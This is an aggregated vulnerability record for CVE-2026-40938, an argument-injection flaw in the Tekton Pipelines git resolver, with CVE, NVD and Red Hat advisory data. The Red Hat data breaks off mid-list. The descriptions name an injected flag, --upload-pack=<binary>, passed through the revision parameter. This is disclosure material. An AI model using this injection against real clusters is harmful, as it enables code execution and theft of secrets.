Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-40938 (GCVE-0-2026-40938)
Vulnerability from cvelistv5 – Published: 2026-04-21 20:45 – Updated: 2026-04-22 18:36- CWE-88 - Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
| URL | Tags |
|---|---|
| https://github.com/tektoncd/pipeline/security/adv… | x_refsource_CONFIRM |
| https://github.com/tektoncd/pipeline/releases/tag… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-40938",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-22T18:31:54.871943Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-22T18:36:16.790Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "pipeline",
"vendor": "tektoncd",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.0.0, \u003c 1.11.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. From 1.0.0 to before 1.11.0, the git resolver\u0027s revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=\u003cbinary\u003e. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration. This vulnerability is fixed in 1.11.1."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-88",
"description": "CWE-88: Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-21T20:45:24.658Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
},
{
"name": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1"
}
],
"source": {
"advisory": "GHSA-94jr-7pqp-xhcq",
"discovery": "UNKNOWN"
},
"title": "Tekton Pipelines: Git Resolver Unsanitized Revision Parameter Enables git Argument Injection Leading to RCE"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-40938",
"datePublished": "2026-04-21T20:45:24.658Z",
"dateReserved": "2026-04-15T20:40:15.518Z",
"dateUpdated": "2026-04-22T18:36:16.790Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-40938",
"date": "2026-05-18",
"epss": "0.00088",
"percentile": "0.24909"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-40938\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-21T21:16:46.283\",\"lastModified\":\"2026-04-28T15:06:01.007\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. From 1.0.0 to before 1.11.0, the git resolver\u0027s revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=\u003cbinary\u003e. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration. This vulnerability is fixed in 1.11.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.6,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H\",\"baseScore\":8.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.8,\"impactScore\":6.0}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-88\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:linuxfoundation:tekton_pipelines:*:*:*:*:*:go:*:*\",\"versionStartIncluding\":\"1.0.0\",\"versionEndExcluding\":\"1.11.0\",\"matchCriteriaId\":\"64DC28D5-E9D3-4D6A-8006-ADDE91D144BA\"}]}]}],\"references\":[{\"url\":\"https://github.com/tektoncd/pipeline/releases/tag/v1.11.1\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-40938\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-22T18:31:54.871943Z\"}}}], \"references\": [{\"url\": \"https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-22T18:13:47.095Z\"}}], \"cna\": {\"title\": \"Tekton Pipelines: Git Resolver Unsanitized Revision Parameter Enables git Argument Injection Leading to RCE\", \"source\": {\"advisory\": \"GHSA-94jr-7pqp-xhcq\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"tektoncd\", \"product\": \"pipeline\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.0.0, \u003c 1.11.1\"}]}], \"references\": [{\"url\": \"https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq\", \"name\": \"https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/tektoncd/pipeline/releases/tag/v1.11.1\", \"name\": \"https://github.com/tektoncd/pipeline/releases/tag/v1.11.1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. From 1.0.0 to before 1.11.0, the git resolver\u0027s revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=\u003cbinary\u003e. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration. This vulnerability is fixed in 1.11.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-88\", \"description\": \"CWE-88: Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-21T20:45:24.658Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-40938\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-22T18:36:16.790Z\", \"dateReserved\": \"2026-04-15T20:40:15.518Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-21T20:45:24.658Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-40938
Vulnerability from fkie_nvd - Published: 2026-04-21 21:16 - Updated: 2026-04-28 15:068.5 (High) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
| Vendor | Product | Version | |
|---|---|---|---|
| linuxfoundation | tekton_pipelines | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:linuxfoundation:tekton_pipelines:*:*:*:*:*:go:*:*",
"matchCriteriaId": "64DC28D5-E9D3-4D6A-8006-ADDE91D144BA",
"versionEndExcluding": "1.11.0",
"versionStartIncluding": "1.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Tekton Pipelines project provides k8s-style resources for declaring CI/CD-style pipelines. From 1.0.0 to before 1.11.0, the git resolver\u0027s revision parameter is passed directly as a positional argument to git fetch without any validation that it does not begin with a - character. Because git parses flags from mixed positional arguments, an attacker can inject arbitrary git fetch flags such as --upload-pack=\u003cbinary\u003e. Combined with the validateRepoURL function explicitly permitting URLs that begin with / (local filesystem paths), a tenant who can submit ResolutionRequest objects can chain these two behaviors to execute an arbitrary binary on the resolver pod. The tekton-pipelines-resolvers ServiceAccount holds cluster-wide get/list/watch on all Secrets, so code execution on the resolver pod enables full cluster-wide secret exfiltration. This vulnerability is fixed in 1.11.1."
}
],
"id": "CVE-2026-40938",
"lastModified": "2026-04-28T15:06:01.007",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 6.0,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2026-04-21T21:16:46.283",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/tektoncd/pipeline/releases/tag/v1.11.1"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/tektoncd/pipeline/security/advisories/GHSA-94jr-7pqp-xhcq"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-88"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
RHSA-2026:17546
Vulnerability from csaf_redhat - Published: 2026-05-14 11:39 - Updated: 2026-05-15 18:22A flaw was found in Tekton Pipelines, a system for declaring continuous integration/continuous delivery (CI/CD) pipelines. An authenticated user, able to submit `ResolutionRequest` objects, can exploit a vulnerability by injecting malicious commands into the git resolver's revision parameter. This allows for the execution of unauthorized programs on the resolver pod. Successful exploitation can lead to the exfiltration of all cluster-wide secrets, resulting in significant information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64 | — |
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Builds 1.8.0",
"title": "Topic"
},
{
"category": "general",
"text": "Releases of Red Hat OpenShift Builds 1.8.0",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:17546",
"url": "https://access.redhat.com/errata/RHSA-2026:17546"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-40938",
"url": "https://access.redhat.com/security/cve/CVE-2026-40938"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/builds_for_red_hat_openshift/1.8",
"url": "https://docs.redhat.com/en/documentation/builds_for_red_hat_openshift/1.8"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_17546.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Builds 1.8.0",
"tracking": {
"current_release_date": "2026-05-15T18:22:46+00:00",
"generator": {
"date": "2026-05-15T18:22:46+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:17546",
"initial_release_date": "2026-05-14T11:39:27+00:00",
"revision_history": [
{
"date": "2026-05-14T11:39:27+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-05-14T11:39:35+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-15T18:22:46+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Builds 1.8.0",
"product": {
"name": "Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_builds:1.8::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Builds"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-controller-rhel9@sha256%3Ad98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683229"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"product": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"product_id": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift-builds-git-cloner-rhel9@sha256%3A4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15?arch=amd64\u0026repository_url=registry.redhat.io/openshift-builds\u0026tag=1778683134"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"product": {
